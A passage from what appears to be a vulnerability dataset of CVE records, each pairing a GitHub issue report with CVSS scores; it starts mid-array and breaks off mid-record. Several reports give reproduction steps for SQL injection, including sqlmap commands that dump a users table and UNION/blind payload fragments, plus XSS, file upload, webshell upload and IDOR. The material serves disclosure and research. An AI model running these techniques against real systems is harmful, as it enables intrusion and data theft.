        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/11",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/11",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2022-02-28T02:50:16Z",
        "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG { //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") APITAG POC: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26315",
        "Issue_Url_old": "https://github.com/claudiodangelis/qrcp/issues/223",
        "Issue_Url_new": "https://github.com/claudiodangelis/qrcp/issues/223",
        "Repo_new": "claudiodangelis/qrcp",
        "Issue_Created_At": "2022-02-28T14:59:45Z",
        "description": "Directory Traversal Vulnerability. While qrcp works on receive mode, uploader can edit the file name in HTTP request and add \"../\". Meanwhile, qrcp doesn't check legality of file name which lead to directory traversal. Env: qrcp NUMBERTAG Windows NUMBERTAG Ubuntu NUMBERTAG Poc: APITAG APITAG APITAG credit: starryloki,lu0sf",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26533",
        "Issue_Url_old": "https://github.com/Xhofe/alist/issues/645",
        "Issue_Url_new": "https://github.com/alist-org/alist/issues/645",
        "Repo_new": "alist-org/alist",
        "Issue_Created_At": "2022-03-01T03:38:23Z",
        "description": "Alist has Cross Site Scripting (XSS) vulnerability. Alist Version / Alist NUMBERTAG Describe the bug / \u95ee\u9898\u63cf\u8ff0 Vulnerability Introduction A route in Alist that uses user inputted parameters when displaying xml files and does not filter them can cause xss. Vulnerability affects version NUMBERTAG ulnerability Analysis A new route was added in Alist NUMBERTAG APITAG , which allows users to control the data parameter in path. FILETAG Simplified code: ERRORTAG The incoming data is decoded by replacing (recovering the original base NUMBERTAG encoded url conflict characters), and then the parameter u is directly spliced and output to the page, so we can use this to construct the xss payload. APITAG The paylod is base NUMBERTAG encoded as follows: APITAG Replace APITAG with APITAG , then splice in the path: APITAG Vulnerability Exploitation After a successful local exploit, try using the official demo site to test: FILETAG Reproduction / \u590d\u73b0\u94fe\u63a5 URLTAG \u65e5\u5fd7 / Logs _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-26534",
        "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2211",
        "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2211",
        "Repo_new": "fisco-bcos/fisco-bcos",
        "Issue_Created_At": "2022-03-01T11:02:17Z",
        "description": "The nodes change view frequently and stop generating blocks.. Describe the bug I start a chain with NUMBERTAG nodes, one of the nodes is a malicious one. It will change the value of some fields of a message. After starting the group, I started the stress testing program. And the program stuck. The log shows that the nodes stop producing new blocks and keep view changing. To Reproduce Steps to reproduce the behavior NUMBERTAG Start a chain with NUMBERTAG nodes NUMBERTAG Start the stress testing program NUMBERTAG The error occurs Expected behavior Nodes produce the blocks normally. Screenshots The stress testing program stuck here NUMBERTAG of the transactions are received) APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2 (master branch) Additional context The log files: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26565",
        "Issue_Url_old": "https://github.com/totaljs/cms/issues/35",
        "Issue_Url_new": "https://github.com/totaljs/cms/issues/35",
        "Repo_new": "totaljs/cms",
        "Issue_Created_At": "2022-02-27T06:16:08Z",
        "description": "Security Issue Cross Site Scripting APITAG Description APITAG ERRORTAG Hello APITAG I report the security issue. When the administrator creates a page, the page is created by inserting XSS APITAG as the name of the page, and the script is executed when going to the page list. APITAG If you want to check the this, go to here URLTAG and login as above account.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-26573",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/840",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/840",
        "Repo_new": "magicblack/maccms10",
        "Issue_Created_At": "2022-03-02T05:24:33Z",
        "description": "There are multiple reflective XSS vulnerabilities in the website. Vulnerability APITAG XSS Vulnerability APITAG risk Affected APITAG Vulnerability APITAG APITAG are some places I found NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1arepeat Verification process\uff1a Get administrator cookies through reflective XSS\uff1a First, the user logs in to the background FILETAG Then we make a payad that can get cookies by using the vulnerable APITAG it to the victim or make it run by other means. For example, here I choose this URL\uff1a FILETAG Other URLs are the same\uff1a FILETAG FILETAG Repair method NUMBERTAG HTML escape the input data so that it is not recognized as an executable script APITAG the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-26605",
        "Issue_Url_old": "https://github.com/Chu1z1/Chuizi/issues/1",
        "Issue_Url_new": "https://github.com/chu1z1/chuizi/issues/1",
        "Repo_new": "chu1z1/chuizi",
        "Issue_Created_At": "2022-03-03T09:57:08Z",
        "description": "APITAG APITAG APITAG Any file download. APITAG APITAG APITAG Any file download \u9700\u8981\u767b\u9646\u5230\u5fb7\u5b9e\u4efb\u610f\u7528\u6237\u624d\u53ef\u4ee5\u5229\u7528 Users need to log in to exploit the vulnerability You can find the interface at the avatar upload to obtain the key generated by the uploaded file path, modify the path of the generated key to generate a malicious key, and import the key at the avatar file reading, resulting in arbitrary file download APITAG \u7528\u6237\u754c\u9762 UI FILETAG \u4e0a\u4f20\u6587\u4ef6 Upload file FILETAG \u53ef\u4ee5\u4fee\u6539\u8fd4\u56de\u8def\u5f84\u4e5f\u53ef\u4ee5\u66f4\u6539\u4e0b\u4e00\u4e2a\u5305\u7684\u8def\u5f84\u83b7\u53d6key You can modify the return path or change the path of the next package to obtain the key FILETAG FILETAG APITAG \u6f0f\u6d1e\u5229\u7528\u6210\u529f Successful exploit FILETAG APITAG Do not infiltrate illegally! Do not penetrate without authorization! Please do not use this vulnerability for illegal and criminal activities! This article is for learning only! The consequences of breaking the law have nothing to do with the author!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-26607",
        "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/9",
        "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/9",
        "Repo_new": "baigostudio/baigocms",
        "Issue_Created_At": "2022-03-03T09:35:22Z",
        "description": "FILETAG NUMBERTAG Upload webshell . It is recommended to use one sentence webshell . E.g : <?php APITAG FILETAG Splicing website path \uff1a http:// FILETAG FILETAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-26613",
        "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/14",
        "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/14",
        "Repo_new": "harshitbansal373/php-cms",
        "Issue_Created_At": "2022-03-03T15:50:07Z",
        "description": "SQL injection in categorymenu page. Description I found a SQL inject vulnerability in page FILETAG and I build a local environment to test it. The url is FILETAG FILETAG The problem code is here. CODETAG Users can control the parameter \"category\" by GET method without any filter,and get something that shouldn't have been APITAG as,if \"category\" is changed like NUMBERTAG union select APITAG will get the database user: FILETAG Proof I use the sqlmap to do this. APITAG database information. sqlmap u URLTAG dbs FILETAG APITAG a database and get table information sqlmap u URLTAG D cms tables FILETAG APITAG a table and get the columns sqlmap u URLTAG D cms T users columns FILETAG APITAG the columns and get column contents. sqlmap u URLTAG D cms T users C username dump FILETAG Solution You can fix it by add some filter rules on the parameter \"category\",such as ban the letter characters.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26613",
        "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/15",
        "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/15",
        "Repo_new": "harshitbansal373/php-cms",
        "Issue_Created_At": "2022-04-11T12:03:05Z",
        "description": "Multiple SQLi. Hello, dear, web developer! You have serious problems, dear web developer! Multiple SQLi STATUS Critical! =) Dude, you must delete this project, please! What kind of web developer are you? \ud83d\ude32 Infected apps : CODETAG Payloads: ERRORTAG Dump: ERRORTAG BR MENTIONTAG Penetration Testing Engineer",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26619",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1702",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1702",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2022-03-04T10:30:01Z",
        "description": "Halo Blog APITAG Fileupload without file type authentication NUMBERTAG APITAG NUMBERTAG Fat Jar \u5728\u7ebf\u7ad9\u70b9\u5730\u5740 URLTAG \u53d1\u751f\u4e86\u4ec0\u4e48\uff1f The vulnerability can lead to the upload of arbitrary malicious script files. \u76f8\u5173\u65e5\u5fd7\u8f93\u51fa shell no \u9644\u52a0\u4fe1\u606f Black box penetration NUMBERTAG Use (demo:P APITAG to login in URLTAG ,and then find the attachment upload feature ,try to upload a random image. FILETAG NUMBERTAG While uploading a random image, use burp suite to catch the request packet and forward it to the Repeater module. FILETAG NUMBERTAG You can tell we successfully uploaded the image from the screenshot below . And we can also get the path of the image accordding to the response. FILETAG NUMBERTAG Now we want to use the feature again. This time ,try to change the file suffix and modify the file content at the same time. After doing that , send the request again. And the upload is still successful , the file path is also returned. FILETAG NUMBERTAG Now try to access the file path within the url below,and our xss payload successfully executed FILETAG NUMBERTAG Screenshots of other file types uploaded are as follows\uff1a FILETAG FILETAG Source code review\uff1a Try to download the source code for source code security analysis FILETAG APITAG version NUMBERTAG FILETAG NUMBERTAG Check the source code and locate the class PATHTAG According to the annotations of this class, you can find that all requests to the path PATHTAG will access this class. FILETAG NUMBERTAG The /upload path accessed by the upload interface will access the APITAG method of this class. FILETAG NUMBERTAG As you can see, this method receives the file from the client side, then passes the file object as an argument to the APITAG method of the APITAG class and executes it, and then executes the result as an argument to the APITAG method of the APITAG class NUMBERTAG So let's follow up on the APITAG method first after locating the PATHTAG class and dive into the APITAG method FILETAG NUMBERTAG You can see that the code does not have any file suffix checksum, and finally the APITAG method will return a create(attachment) object, continue to follow up to the APITAG method, you can see that an Attachment class object is returned, and there is no file checksum. FILETAG NUMBERTAG The returned object is entered as an argument to the APITAG method of the PATHTAG class, in which you can see that the code writes the path of the uploaded file to the APITAG instance object, and it can be found that there is no logic of permission checking, and finally the method returns an APITAG instance object. FILETAG NUMBERTAG When the file path is set, this information will be brought into the response packet and eventually fed back to the client, so we can successfully access the uploaded file in the response packet based on this path information NUMBERTAG According to the analysis of the above code, we can see that there is no logic in the code to check the file suffix, file content and file format, so it can lead to arbitrary file upload\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26630",
        "Issue_Url_old": "https://github.com/guodongtech/jellycms/issues/1",
        "Issue_Url_new": "https://github.com/guodongtech/jellycms/issues/1",
        "Repo_new": "guodongtech/jellycms",
        "Issue_Created_At": "2022-03-05T08:07:50Z",
        "description": "Jellycms background has any file download vulnerability . Vulnerability file address: PATHTAG FILETAG User can change the param APITAG to download any files. User use the packdownload functions in Database management,then change the APITAG likes PATHTAG package likes this: APITAG then the user can download the zip file,unpack the file to get the config file contents.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-26967",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2138",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2138",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-03-10T09:47:43Z",
        "description": "FILETAG Acknowledgement FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26981",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/1171",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/1171",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2022-03-04T08:53:12Z",
        "description": "FILETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27007",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/469",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/469",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-02-15T08:42:02Z",
        "description": "Patch bypass for njs_await_fulfilled, causing UAF again. This UAF was introduced in a patch for a similar bug NUMBERTAG which shows that njs_await_fulfilled is still flawed. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit p1umer( APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27008",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/471",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/471",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-02-15T09:26:33Z",
        "description": "SEGV APITAG in njs_array_add. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27041",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/248",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/248",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2022-03-07T15:07:24Z",
        "description": "SQL Injection in PATHTAG Due to lack of protection, parameter APITAG in PATHTAG can be abused to injection SQL queries to extract information from databases. POC: Type: boolean based blind Title: Boolean based blind Parameter replace (original value) Payload: PATHTAG (SELECT (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE (SELECT NUMBERTAG UNION SELECT NUMBERTAG END))&ajax=true Type: time based blind Title: APITAG NUMBERTAG AND time based blind (heavy query) Payload: PATHTAG AND APITAG Type: UNION query Title: Generic UNION query (NULL NUMBERTAG columns Payload: PATHTAG UNION ALL SELECT APITAG &ajax=true FILETAG Traceback: PATHTAG Solution: Use function APITAG before assign $_REQUEST FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27044",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/156",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/156",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2021-09-01T11:17:40Z",
        "description": "heap buffer overflow in PATHTAG Hi,I found a heap buffer overflow in the current master NUMBERTAG a5be8b URLTAG I build APITAG with ASAN ,this is ASAN report. OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG ERRORTAG It happens in: URLTAG when NUMBERTAG y NUMBERTAG width NUMBERTAG then gdb info: FILETAG In this position,[r NUMBERTAG rc NUMBERTAG will be APITAG => APITAG So,writing to data will cause overflow and then it writes to a location (chunk) in the heap that should not be written to. heap info: Before: CODETAG After: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27046",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/157",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/157",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2021-09-14T12:18:43Z",
        "description": "heap use after free in PATHTAG Hi,I found a heap use after free in the current master NUMBERTAG a5be8b URLTAG I build img2sixel with ASAN,this is ASAN report. OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27047",
        "Issue_Url_old": "https://github.com/moxi624/mogu_blog_v2/issues/62",
        "Issue_Url_new": "https://github.com/moxi624/mogu_blog_v2/issues/62",
        "Repo_new": "moxi624/mogu_blog_v2",
        "Issue_Created_At": "2022-03-08T07:21:56Z",
        "description": "mogu_blog NUMBERTAG backend Management System has an vulnerability of uploading arbitrary files. APITAG box pentesting Using mogu NUMBERTAG mogu NUMBERTAG to log in the mogu_blog NUMBERTAG backend Management System. FILETAG Find the Blog Management Blog Management Local file Upload feature . FILETAG Click this blue button to select a local image for uploading, and then click the green button to put the image to server side FILETAG At this point, use the burp suite to capture the request packet. FILETAG and then forward it to the Repeater module. Try to send a request to upload a normal image and you can see that the image was uploaded successfully. And the response packet returns the address information of the image. FILETAG Splice the address in the response packet with the url to try to access the image we just uploaded . The whole url : FILETAG You can see the successful access to the uploaded image. FILETAG Back in the burp suite, try changing the contents of the file in the request package to xss payload\uff0cas well as trying to change the file name to an html suffix. FILETAG You can see the successful upload and the file path in the response package. Splice the file path to the url and open a new browser (without admin PATHTAG ) to try to access it. The whole url : FILETAG FILETAG You can see that the xss payload was successfully executed and that there is an arbitrary file to upload. Try again to modify the request package and found that arbitrary file uploads were possible while the feature was intended to allow only image format files to be uploaded. jsp: FILETAG php: FILETAG cpp: FILETAG APITAG box pentest Based on the url of the image upload request ( PATHTAG ), we can tell that the class that handles the image upload function is located in the /mogu picture subproject FILETAG FILETAG According to the request url ( PATHTAG ) continue to locate the APITAG class PATHTAG FILETAG With APITAG you can see that all requests for the /file path will be processed by this class And requests for the /file/pictures path are handled by the APITAG method of this class FILETAG This method first obtains the system configuration file, and this step does not perform any checks on the suffix name, format, or file content of the uploaded file This method then calls the APITAG method of the APITAG class instance object FILETAG Follow up in the APITAG method of the APITAG class to see its source code FILETAG The first part of the code is to get some files and system base information, none of which is file checked Continuing to follow up to the code for file uploads, You can see that there is no strict verification of the uploaded file extension, file content, or file format FILETAG The next code execution reaches the try /catch {} block, which involves the APITAG method of the APITAG class FILETAG Going deeper into this method leads to the APITAG method. FILETAG You can see that the file suffix, file format and file content are still not strictly verified. Back in the APITAG method of the APITAG class, After checking the code after , not only the code for uploading the APITAG server did not have strict file verification, but also the code for uploading Minio server and the code for uploading to the local server was not strictly verified. Finally, in the APITAG method of the APITAG class, the following code will be executed. FILETAG Set the information of the uploaded file to some settings. Then save and upload feedback to the client response file. The entire code execution process does not strictly check the suffix name, file format, and file content of the uploaded files. This allows attackers to use the file upload interface to upload arbitrary files and even insert xss payloads.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27055",
        "Issue_Url_old": "https://github.com/ecjia/ecjia-daojia/issues/20",
        "Issue_Url_new": "https://github.com/ecjia/ecjia-daojia/issues/20",
        "Repo_new": "ecjia/ecjia-daojia",
        "Issue_Created_At": "2022-03-08T11:32:51Z",
        "description": "information leakage. FILETAG file line NUMBERTAG creates the .env file Content APITAG = APITAG . DIRECTORY_SEPARATOR . '.env'; Its content is to create a .env file in the root directory and write the database account, password, and database name",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27103",
        "Issue_Url_old": "https://github.com/element-plus/element-plus/issues/6514",
        "Issue_Url_new": "https://github.com/element-plus/element-plus/issues/6514",
        "Repo_new": "element-plus/element-plus",
        "Issue_Created_At": "2022-03-10T07:47:54Z",
        "description": "Bug Report] APITAG [table column] table column \u4e2d\u5bf9\u4e8e \u5c5e\u6027 show overflow tooltip \u5904\u7406\u5b58\u5728\u95ee\u9898 \u53ef\u4ee5\u5bfc\u81f4 XSS. APITAG Bug Type: Component Environment Vue Version: APITAG Element Plus Version: APITAG Browser / OS: APITAG Build Tool: Vue CLI Reproduction Related Component APITAG Reproduction Link APITAG Repo URLTAG Steps to reproduce \u6309\u7167 \u590d\u73b0\u9879\u76ee\u7684 readme \u8fdb\u884c\u6784\u5efa \u8bbf\u95ee serve \u5728 \u542b\u6709 payload \u7684 address \u7684\u5217\u5904\u4e2d\u5212\u8fc7\u5149\u6807 \u5c31\u53ef\u4ee5\u89e6\u53d1 js \u8fd0\u884c\u5bfc\u81f4 xss What is Expected? \u6e32\u67d3img\u6216\u8005\u4e0d\u6e32\u67d3\u90fd\u53ef\u4ee5 \u4f46\u4e0d\u53ef\u4ee5\u6267\u884c APITAG What is actually happening? \u6e32\u67d3\u6587\u672c\u5185\u5bb9\u4e3a html \u5e76\u4e14\u6267\u884c APITAG \u811a\u672c Additional comments elementui plus \u662f\u4e00\u4e2a\u5927\u4ed3\u5e93\u5bfc\u81f4\u6709\u8bb8\u8bb8\u591a\u591a\u7684\u524d\u7aef\u9879\u76ee\u4f9d\u8d56\u5176\u800c\u6784\u5efa show overflow tooltip \u5df2\u7ecf\u53ef\u4ee5\u901a\u8fc7 github \u4ee3\u7801\u641c\u7d22 \u627e\u5230\u76f8\u5173\u9879\u76ee \u5e76\u4e14\u5176\u4e2d\u5305\u542b\u4e00\u4e9b\u90e8\u5206\u540e\u53f0\u7ba1\u7406\u9879\u76ee \u5efa\u8bae\u901a\u77e5\u5f00\u53d1\u8005 \u66f4\u65b0\u9879\u76ee\u4e0e\u4fee\u590d\u8be5\u95ee\u9898 \u6b64\u5916\u6587\u6863\u4e2d\u5efa\u8bae\u6dfb\u52a0\u76f8\u5173 \u5b89\u5168\u8b66\u544a \u5176\u4ed6\u76f8\u5173\u4fe1\u606f: URLTAG Reporter: MENTIONTAG MENTIONTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27103",
        "Issue_Url_old": "https://github.com/asjdf/element-table-xss-test/issues/1",
        "Issue_Url_new": "https://github.com/asjdf/element-table-xss-test/issues/1",
        "Repo_new": "asjdf/element-table-xss-test",
        "Issue_Created_At": "2022-03-10T06:13:23Z",
        "description": "vuln location seems like there.. URLTAG They render the html as the code. All Frontend Program used show overflow tooltips = true attr and concat the backend feedback into this column seems has this problem. and morse over triggerred XSS",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27107",
        "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1176",
        "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1176",
        "Repo_new": "orangehrm/orangehrm",
        "Issue_Created_At": "2022-03-10T13:56:32Z",
        "description": "Stored XSS in the APITAG Video\" section under APITAG via the GET/POST APITAG APITAG parameter. Environment details APITAG version NUMBERTAG APITAG source: Release build from APITAG URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug In order to share a video, a user provides the URL in the APITAG Video\" feature under APITAG A GET request is then sent to the PATHTAG endpoint with the url as a parameter. The application's backend then validates the url against a whitelist of domains and sends an appropriate response. If the domain in the url is in the whitelist, the application creates an iframe element and embeds the video link in it. The user then submits the post by clicking the APITAG Video\" button. The APITAG page, including the newly posted video, is sent back in the response body. The initial whitelist based validation can be bypassed by sending a request, like the above, containing any arbitrary URL in the APITAG parameter. The value of this parameter is injected into the iframe's src attribute. Due to this, it is possible to inject the javascript: pseudo protocol and gain arbitrary APITAG execution in the browser of anyone who visits the APITAG page. For example, the string APITAG can be passed as the value of the APITAG parameter. When a user visits the APITAG page, the payload will be interpreted as APITAG and get executed so an alert will pop up with the domain hosting the application at that instance. To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to APITAG > APITAG Video NUMBERTAG Paste any youtube.com video link NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on APITAG video NUMBERTAG Replace the value in the POST parameter APITAG to APITAG and click on APITAG in Burp NUMBERTAG Turn off Intercept in Burp NUMBERTAG Navigate to APITAG NUMBERTAG Notice that an alert will pop up with the Domain value of the application's server printed which means the payload we injected into the APITAG parameter is interpreted as valid Javascript and is executed. Expected behavior The value of the APITAG parameter is validated by the application's backend and an error is thrown. What do you see instead: The post gets uploaded successfully. Screenshots FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-27108",
        "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1173",
        "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1173",
        "Repo_new": "orangehrm/orangehrm",
        "Issue_Created_At": "2022-03-10T13:56:23Z",
        "description": "Insecure Direct Object Reference (IDOR) via the end point APITAG allows any user can create a timesheet in another user's account. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug A user can create a timesheet for a specific week by using the APITAG Timesheet\" functionality, after which the timesheet is accessible for editing and submission under the dropdown menu. It was observed that when the APITAG parameter was set to any valid user's employee ID, a timesheet was created in that employee's account. The application verifies if a user has a valid session, but does not verify if a user is authorised to create a timesheet for a different APITAG . It is also possible to find out whether a timesheet has already been created for a specific week, by analysing the HTTP response. To Reproduce NUMBERTAG Login to the APITAG application as user A with APITAG as APITAG NUMBERTAG Navigate to APITAG > \"My Timesheet NUMBERTAG Click on APITAG Timesheet NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on the textbox and select any date, say NUMBERTAG Click on \"Ok NUMBERTAG Go to the Burp Intercept tab and you will notice a GET request being made to the APITAG endpoint NUMBERTAG Modify the value of APITAG parameter to a user B's APITAG , APITAG NUMBERTAG Click on Forward and turn off Intercept NUMBERTAG Login to user B's account NUMBERTAG Navigate to APITAG > \"My Timesheet NUMBERTAG Click on the 